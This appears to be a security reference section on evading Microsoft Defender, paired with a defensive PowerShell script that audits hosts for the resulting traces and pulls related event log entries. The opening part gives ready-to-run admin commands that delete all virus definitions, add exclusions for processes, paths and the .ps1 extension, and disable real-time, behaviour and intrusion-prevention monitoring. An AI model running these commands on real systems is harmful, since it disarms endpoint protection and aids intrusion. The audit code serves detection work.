EDR / AV Evasion
Evading security solutions can be a tricky and difficult task. Windows Defender is typically one of the more easily bypassable security solutions, unless Defender MDE/MDI are deployed via Intune or alternative methods.
Some simple ways to disarm Defender include:
Removing all virus definitions of Microsoft Defender (Administrator required)
# Run in CMD or PowerShell
PS:> cmd /c "%PROGRAMFILES%\Windows Defender\MPCMDRUN.exe" -RemoveDefinitions -All
# PowerShell form: the path contains a space, so it must be quoted and invoked with the call operator
PS:> & "C:\Program Files\Windows Defender\MPCMDRUN.EXE" -RemoveDefinitions -All
Adding a process, folder, file or extension to the exclusion list (Administrator required)
# Exclude a process
PS:> Set-MpPreference -ExclusionProcess untrusted.exe
# Exclude a folder
PS:> Set-MpPreference -ExclusionPath C:\Excluded\Path
# Exclude a file
PS:> Set-MpPreference -ExclusionPath C:\location\of\evil\binary\evil.exe
# Exclude an extension
PS:> Set-MpPreference -ExclusionExtension .ps1
Disabling Microsoft Defender's real-time protection (Administrator required)
# Disable real-time protection, behavioural monitoring and intrusion prevention
PS:> Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableBehaviorMonitoring $true
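All three changes above (removed definitions, exclusions, disabled real-time protection) leave traces in Defender's own state and in its operational event log, and all three are blocked outright when Tamper Protection is enabled. The following PowerShell is an added example, not part of the original page: it audits a host for exactly those traces and pulls the related configuration-change events. Cmdlet and property names (Get-MpComputerStatus, Get-MpPreference, Get-WinEvent and the properties they expose) are the real ones from the Defender module; the 3-day signature-age threshold and the severity labels are this example's own assumptions.

```powershell
# Added example (not from the original page): audit a host for the Defender
# weakening described above. Run in an elevated PowerShell on a machine that
# has the Defender module. Thresholds and severity labels are assumptions.

function Get-DefenderTamperFindings {
    [CmdletBinding()]
    param(
        # Signatures older than this many days are flagged (assumed threshold)
        [int]$MaxSignatureAgeDays = 3
    )

    $status   = Get-MpComputerStatus
    $pref     = Get-MpPreference
    $findings = @()

    # 1. Definitions removed or stale: MpCmdRun -RemoveDefinitions leaves the
    #    engine with no usable signatures, so age grows and/or version is empty.
    if (($status.AntivirusSignatureAge -gt $MaxSignatureAgeDays) -or (-not $status.AntivirusSignatureVersion)) {
        $findings += [pscustomobject]@{
            Check    = 'SignatureAge'
            Detail   = "Signatures are $($status.AntivirusSignatureAge) day(s) old (version '$($status.AntivirusSignatureVersion)')"
            Severity = 'High'
        }
    }

    # 2. Exclusions: surface every path, process and extension exclusion for review.
    #    @() wrapping keeps the loops working when a list is $null (no exclusions).
    foreach ($p in @($pref.ExclusionPath)) {
        if ($p) { $findings += [pscustomobject]@{ Check = 'ExclusionPath';      Detail = $p; Severity = 'Medium' } }
    }
    foreach ($p in @($pref.ExclusionProcess)) {
        if ($p) { $findings += [pscustomobject]@{ Check = 'ExclusionProcess';   Detail = $p; Severity = 'Medium' } }
    }
    foreach ($e in @($pref.ExclusionExtension)) {
        if ($e) { $findings += [pscustomobject]@{ Check = 'ExclusionExtension'; Detail = $e; Severity = 'Medium' } }
    }

    # 3. Protection features switched off via Set-MpPreference -Disable*.
    if (-not $status.RealTimeProtectionEnabled) {
        $findings += [pscustomobject]@{ Check = 'RealTimeProtection'; Detail = 'Disabled'; Severity = 'High' }
    }
    if (-not $status.BehaviorMonitorEnabled) {
        $findings += [pscustomobject]@{ Check = 'BehaviorMonitoring'; Detail = 'Disabled'; Severity = 'High' }
    }
    if ($pref.DisableIntrusionPreventionSystem) {
        $findings += [pscustomobject]@{ Check = 'IntrusionPrevention'; Detail = 'Disabled'; Severity = 'High' }
    }

    # 4. Tamper Protection is the control that blocks all of the above; flag it if off.
    if (-not $status.IsTamperProtected) {
        $findings += [pscustomobject]@{ Check = 'TamperProtection'; Detail = 'Not enabled'; Severity = 'High' }
    }

    return $findings
}

function Get-DefenderConfigChangeEvents {
    param([int]$Hours = 24)
    # Defender operational log IDs emitted by the changes above:
    #   5001 real-time protection disabled, 5004 real-time protection config changed,
    #   5007 platform configuration changed (covers exclusion changes),
    #   5010/5012 malware/virus scanning disabled, 5013 Tamper Protection blocked a change.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5004, 5007, 5010, 5012, 5013
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

# Usage:
Get-DefenderTamperFindings | Format-Table -AutoSize
Get-DefenderConfigChangeEvents -Hours 72 | Format-Table -AutoSize -Wrap
```

Get-WinEvent throws when no events match, which is why the call uses -ErrorAction SilentlyContinue; an empty result on a host that should have produced 5007 events is itself worth checking, because it can mean the log was cleared. For fleet-wide coverage the same state is exposed through the Defender MDE/MDI deployments the page mentions, where exclusion and real-time-protection changes are reported centrally rather than only in the local log.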